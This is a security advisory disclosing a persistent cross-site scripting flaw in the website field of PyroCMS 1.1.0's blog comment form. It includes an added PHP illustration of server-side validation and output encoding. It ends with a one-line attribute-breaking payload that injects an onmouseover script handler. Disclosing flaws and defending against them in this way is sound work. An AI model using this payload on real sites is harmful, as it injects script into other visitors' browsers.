A persistent cross-site scripting vulnerability in PyroCMS version 1.1.0 can be exploited to execute arbitrary JavaScript.
------------------------------------------------------------------------
Software................PyroCMS 1.1.0
Vulnerability...........Persistent Cross-site Scripting
Threat Level............Moderate (2/5)
Download................http://pyrocms.com/
Vendor Contact Date.....3/11/2011
Disclosure Date.........3/25/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
--Description--
A persistent cross-site scripting vulnerability in PyroCMS 1.1.0 can
be exploited to execute arbitrary JavaScript.
--Exploit--
The website field of the blog comment form is vulnerable to persistent
cross-site scripting. Because the length limits are not enforced
server-side, they can be bypassed by manipulating the form.
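The two controls whose absence the paragraph above describes, server-side validation of the website field and attribute-context encoding on output, shown as an added example. This is not PyroCMS code or the vendor's fix; the function names and the 255-byte limit are assumptions.

```php
<?php
// Added illustration, not PyroCMS code. Function names and the 255-byte
// limit are assumptions; the advisory does not state the real limit.
const WEBSITE_MAX_LEN = 255;

/** Server-side check of the comment "website" field; null means reject. */
function validate_website(string $raw): ?string
{
    $url = trim($raw);
    // A maxlength attribute in the form is only a browser hint, so the
    // limit has to be enforced again here.
    if ($url === '' || strlen($url) > WEBSITE_MAX_LEN) {
        return null;
    }
    // Quotes, angle brackets, whitespace and control bytes never belong
    // in a stored URL and are what lets a value leave an attribute.
    if (preg_match('/[\s"\'<>`\x00-\x1f]/', $url)) {
        return null;
    }
    // Accept only absolute http(s) URLs that name a host.
    $parts = parse_url($url);
    if (!is_array($parts) || empty($parts['host'])) {
        return null;
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    return in_array($scheme, ['http', 'https'], true) ? $url : null;
}

/** Render the commenter link, encoding for the HTML attribute context. */
function render_author_link(string $name, ?string $website): string
{
    $safeName = htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
    if ($website === null) {
        return $safeName;
    }
    $safeUrl = htmlspecialchars($website, ENT_QUOTES, 'UTF-8');
    return '<a href="' . $safeUrl . '" rel="nofollow">' . $safeName . '</a>';
}

// Sample input: the value from this advisory's PoC section.
$poc = '"style="position:absolute;top:0;left:0;width:9999px;height:200px;"onmouseover="alert(0)';
var_dump(validate_website($poc));                 // input-validation path
echo render_author_link('visitor', $poc), "\n";   // output-encoding path, as if validation were skipped
echo render_author_link('visitor', validate_website('http://example.com/')), "\n";
```

Encoding at output is the control that closes the hole; validation at input only narrows what gets stored.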
--PoC--
"style="position:absolute;top:0;left:0;width:9999px;height:200px;"onmouseover="alert(0)